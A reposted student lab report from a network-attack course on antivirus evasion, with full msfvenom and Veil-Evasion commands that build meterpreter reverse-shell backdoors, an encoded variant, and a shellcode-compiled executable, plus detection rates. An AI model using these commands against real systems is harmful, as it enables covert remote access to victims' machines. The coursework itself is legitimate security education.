正文 

当前位置: 首页 > java > java教程

20145239杜文超《网络对抗》-免杀原理与实践

20145239杜文超 20145239杜文超     2022-08-25     788

关键词:

《网络对抗》- 免杀原理与实践

基础问题回答

(1)杀软是如何检测出恶意代码的?

  • 根据搜集来的最全的、最新的特征码库,检测程序有没有异常或者可疑的行为。

(2)免杀是做什么?

  • 利用一些手段,让你的的后门不被AV软件发现。

(3)免杀的基本方法有哪些?

  • 加壳、用其他语言进行重写再编译。
  • 使用反弹式连接。
  • 自己手工编一个。

实践总结与体会

      这次的免杀实验做得非常顺利,每一个步骤基本上都一次成功,虽然这正是我所希望的但也有不好就是万一下次遇到问题可能不会解决,毕竟遇到问题、解决问题的过程才能让学习的效果达到最大化。最令我得意的是我把win10自带的Windowsdefender关闭后,明目张胆地运行我的后门,然后打开腾讯管家进行杀毒,居然!没有发现威胁,可喜又可悲,我一个菜鸟级别的黑客做得经过免杀处理的后门居然都杀不掉,那遇到大神做得那该咋办呢?

离实战还缺些什么技术或步骤?

  • 如何把后门悄无声息的植入到被攻击者的电脑里,还有控制端需要一个稳定的ip地址来监听靶机。
  • 杀毒软件的病毒库更新太快,自己编写很有难度,所以还需要对代码有更深层次的理解。

实践过程记录

msfvenom直接生成meterpreter可执行文件

  • 使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.128 PORT=208 -f exe > test_20145239.exe

  • 果然,一大半的杀软都查出来了。

Msfvenom使用编码器生成可执行文件

  • msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.119.128 LPORT=208 -f exe > 5239-encoded.exe

  • 效果也不理想,看来编码也没什么用

Veil-Evasion生成可执行文件

  • 因为我使用了老师的虚拟机,自带Veil-Evasion,所以直接开始实验
  • 在终端下输入指令veil-evasion即可打开软件,依次输入以下指令:

use python/meterpreter/rev_tcp //设置payload

set LHOST 192.168.119.128 //设置反弹连接IP

set LPORT 4444 //设置反弹端口4444

generate //生成

test2_5239//程序名

1

  • 生成的后门直接拿去检测

  • 还行还行,只有25%的杀软查出来了。

利用shellcode编写后门程序的检测

  • 先使用命令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.128 LPORT=443 -f c生成一个c语言格式的Shellcode数组
  • 然后利用VS2013打开老师给出的代码,修改修改(代码具体内容自行脑补,嘿嘿)

  • 完成后编译运行
  • win下的exe就相当于后门

  • 看一下kali,已经反弹连接成功了

  • 依旧输入一下dir指令试试,成功获得文件目录信息!

  • 再次使用virscan扫描一下,大获成功,只有10%的杀毒软件杀出了我的后门。

  • 好,现在来测试一下我电脑上的杀毒软件吧!先关闭windowsdefender打开腾讯电脑管家。
  • 扫描一下病毒:

  • 天哪!居然无风险项。再在kali使用后门截个图,一点影响都没有,照常使用。

  • 好吧,腾讯电脑管家太不靠谱了,天知道他漏过了多少后门,打开win下的windowsdefender扫描试试:

  • 上次实验我没做免杀的后门分分钟就被杀了,这次还是给力的杀出了我后门。
  • 看来windowsdefender没有网上说的那么一无是处还是很优秀的。

 

  • 最后附上我电脑上的杀软版本:

 

20145239杜文超《网络对抗技术》-恶意代码分析

20145239杜文超《网络对抗技术》-恶意代码分析实验后回答问题1.如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所有想监控下系统一天天的到底在干些什么。请设计下你想监控的操作有哪些,用什么方法来监控。(1)使... 查看详情

20155324《网络对抗》免杀原理与实践(代码片段)

20155324《网络对抗》免杀原理与实践免杀原理实验内容(1)理解免杀技术原理(2)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧;(3)通过组合应用各种技术实现恶意代码免杀(4)用另一电脑实测,在... 查看详情

20145309《网络对抗技术》免杀原理与实践

20145309《网络对抗技术》免杀原理与实践1.基础问题回答(1)杀软是如何检测出恶意代码的?根据特征来检测:对已存在的流行代码特征的提取与比对根据行为来检测:是否有更改注册表行为、是否有设置自启动、是否有修改权... 查看详情

20155217《网络对抗》exp03免杀原理与实践(代码片段)

20155217《网络对抗》Exp03免杀原理与实践实践内容正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧。通过组合应用各种技术实现恶意代码免杀(如果成功实现了免杀的,简单... 查看详情

20155302《网络对抗》exp3免杀原理与实践

20155302《网络对抗》Exp3免杀原理与实践实验要求1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;(1.5分)2.通过组合应用各种技术实现恶意代码免杀(1分)(如果成功实现了... 查看详情

20145331魏澍琛《网络对抗》——免杀原理与实践

20145331魏澍琛《网络对抗》——免杀原理与实践问题回答1、杀软是如何检测出恶意代码的?一个是基于特征码的检测,第二个是启发式恶意软件检测,最后是基于行为的恶意软件检测2、免杀是做什么?让病毒不被杀毒软件kill掉3... 查看详情

20155338《网络对抗》exp3免杀原理与实践

20155338《网络对抗》Exp3免杀原理与实践实验过程一、免杀效果参考基准Kali使用上次实验msfvenom产生后门的可执行文件,上传到老师提供的网址http://www.virscan.org/上进行扫描,有48%的杀软报告病毒。二、使用msf编码器编码一次,在K... 查看详情

2017-2018-420155317《网络对抗技术》exp3免杀原理与实践

2017-2018-420155317《网络对抗技术》EXP3免杀原理与实践一、问题回答(1)杀软是如何检测出恶意代码的?(2)免杀是做什么?(3)免杀的基本方法有哪些?2.实践(1)正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,... 查看详情

2017-2018-2《网络对抗技术》20155322exp3免杀原理与实践(代码片段)

#2017-2018-2《网络对抗技术》20155322Exp3免杀原理与实践[-=博客目录=-]1-实践目标1.1-实践介绍1.2-实践内容1.3-实践要求2-实践过程2.1-正确使用msf编码器2.2-veil-evasion2.3-组合应用技术实现免杀2.4-靶机实测2.5-基础问题回答3-资料1-实践目... 查看详情

20154307《网络对抗》exp3免杀原理与实践(代码片段)

20154307《网络对抗》Exp3免杀原理与实践一、基础问题回答(1)杀软是如何检测出恶意代码的?基于特征码的检测:杀毒软件检测到有程序包含的特征码与其特征码库的代码相匹配,就会把该程序当作恶意软件。启发式恶意软件... 查看详情

20165218《网络对抗技术》exp3免杀原理与实践(代码片段)

Exp3免杀原理与实践任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧使用VirusTotal或Viscan网站扫描后门程序VirusTotalViscan免杀工具1——msfvenom使用编码器-使用msfvenom命... 查看详情

2017-2018-220155225《网络对抗技术》实验三免杀原理与实践(代码片段)

2017-2018-220155225《网络对抗技术》实验三免杀原理与实践免杀工具1——msfvenom使用编码器知道msfvenom的编码原理,就知道不管迭代编码多少次都没用,总有一段译码指令在头部,这个头部就在特征库里,一下就检测出来了。但还是... 查看详情

20155232《网络对抗》exp3免杀原理与实践(代码片段)

20155232《网络对抗》Exp3免杀原理与实践问题回答1.基础问题回答(1)杀软是如何检测出恶意代码的?基于特征码的检测特征码:一段特征码就是一段或多段数据。如果一个可执行文件(或其他运行的库、脚本等)包含这样的数据... 查看详情

20155218《网络对抗》exp3免杀原理与实践(代码片段)

20155218《网络对抗》Exp3免杀原理与实践一、使用msf生成后门程序的检测(1)将上周msf生成的后门文件放在virscan.org中进行扫描,截图如下:(2)使用msf时对它多编码1次并进行测试发现能发现的杀软变少;(3)使用msf时对它多编... 查看详情

2018-2019-220165114《网络对抗技术》exp3免杀原理与实践(代码片段)

Exp3免杀原理与实践目录一、实验内容二、基础问题回答(1)杀软是如何检测出恶意代码的?(2)免杀是做什么?(3)免杀的基本方法有哪些?三、实践过程记录正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用... 查看详情

2018-2019-2网络对抗技术201652287exp3免杀原理与实践(代码片段)

2018-2019-2网络对抗技术201652287Exp3免杀原理与实践**免杀**-一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。-要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-viru... 查看详情

2018-2019-2网络对抗技术20165228exp3免杀原理与实践(代码片段)

2018-2019-2网络对抗技术20165228Exp3免杀原理与实践免杀一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是... 查看详情

2018~2019-420165107网络对抗技术exp3免杀原理与实践(代码片段)

20165107Exp3免杀原理与实践实验要求1、正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,自己利用shellcode编程等免杀工具或技巧2、通过组合应用各种技术实现恶意代码免杀3、用另一电脑实测,在杀软开... 查看详情